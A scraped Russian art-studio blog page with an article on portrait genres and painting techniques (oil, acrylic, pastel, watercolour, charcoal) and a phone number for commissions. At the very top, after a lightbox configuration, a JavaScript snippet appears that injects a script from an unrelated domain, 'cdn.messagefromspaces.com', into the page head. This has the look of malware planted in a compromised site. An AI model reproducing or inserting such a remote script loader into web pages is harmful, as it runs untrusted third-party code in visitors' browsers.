, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Портрет

Автор: Дмитрий Алмазов | 09 Фев 2014

Портрет в технике сухая кистьПортрет в изобразительном искусстве – это средство построения образа человека,  переда его внешности. Портрет – изображение группы людей или какого-либо отдельного человека. Самый важный критерий портрета  – сходство изображения с человеком, отраженным на нем. Этого легко можно добиться, если верно передать не только внешний облик портретируемого, но и раскрыть его духовное начало, отразить данную эпоху, социальную принадлежность, национальность и многое другое. Также не маловажное значение на готовый портрет оказывает отношение художника к портретируемому человеку, его техника и стиль написания, мировоззрение, которые придают образу на портрете субъективную авторскую окраску.

Автопортрет масломВ изобразительном искусстве существует множество видов написания портретов. Особый жанр портрета – автопортрет, который показывает какое-либо изображение самого художника, написанное им самим с помощью зеркала. По количеству отраженных людей портрет может быть индивидуальным, парным или групповым. В зависимости от особенности изображения персонажей на погрудные, в полный рост, анфас, профиль и т. д.

Существует множество различных техник написания портрета, каждая из которых по-своему интересна и предаст портрету неповторимую уникальность.

Портрет маслом Фоминов ВикторОсновной способ написания портрета является, конечно же масляная живопись, которая в течение многих столетий стала главной не только в Европе, но и во всем мире. Эта техника позволяет художнику использовать более широкие возможности для раскрытия замысла передачи индивидуальности человека. С помощью разнообразия палитры масляной живописи, творец может на портрете создать иллюзию пространства и объема. Однако, для владения этой техникой, художнику необходимо знание определенных нюансов и специальных приемов. Разнообразие возможностей, сочность красок и долговечность – несомненно, являются преимуществами данной техники.

Немногим уступает живописи маслом написание портретов акриловыми красками. Преимуществом этой техники перед масляной живописью является то, что акриловые краски быстро сохнут и не пахнут. Это позволяет сократить время написания портрета. Еще одним преимуществом является повышенная устойчивость к внешнему воздействию. Акриловая краска не тускнет со временем, а портрет, в отличие от масляного, не нужно помещать под стекло, так как он покрывается специальным лаком, который позволяет ухаживать за портретом. С помощью этой техники можно добиться, как и насыщенности цвета, контрастности, так и мягких переходов.

женский портрет пастельюЧувственность, воздушность, легкость и нежность полутонов – все это отличает портрет, написанный в технике пастель. Пастельная живопись наиболее подходит для написания женских портретов. При работе пастелью не нужно использовать краски, кисточки, растворители и прочее, нужны только бруски спрессованного пигмента. Работа пастелью на первый взгляд кажется незамысловатой и простой, как рисование мелом на стене, однако, это не так, она требует огромного мастерства и возможна лишь на специальной пастельной бумаге.

портрет акварельюЕще одной техникой написание портрета является живопись акварелью. Данная техника разнообразна по своим приемам и способам использования красок. Эта техника разделяется на живопись истой акварелью, акварелью по методу гуаши и гуашью. Своеобразную прелесть этой техники составляет прозрачность красок, просвечивающих белый фон бумаги, легкость и в то же время яркость красок. В этой технике абсолютно не допускаются белила, их роль выполняет сама бумага. Акварельная живопись отличается эффектом легкости и богатством тона.

Самой простой, но не менее привлекательной техникой написание портрета является написание его в черно-белых тонах. Это возможно с помощью карандаша или угля. Не Двойной портрет Фоминов В.смотря на кажущуюся простоту, черно-белые тона лучшим образом передают текстуру, тон кожи лица и выразительность глаз, а также настроение и эмоции позирующего.

В какой бы технике не был выполнен портрет, художник постарается передать ваши лучшие черты, эмоции, настроение, что придаст ему уникальность и неповторимость.

Заказать портрет у художников из Воронежа Вы можете по телефону 8(960)134-46-27 или написать письмо на странице контакты и мы перезвоним Вам. Будем рады написать для Вас портрет, который будет радовать Вас и ваших друзей.

Темы: Арт Воронеж, Портрет | Комментарии отключены

Комментарии закрыты.

Лаборатория Искусства работает на WordPress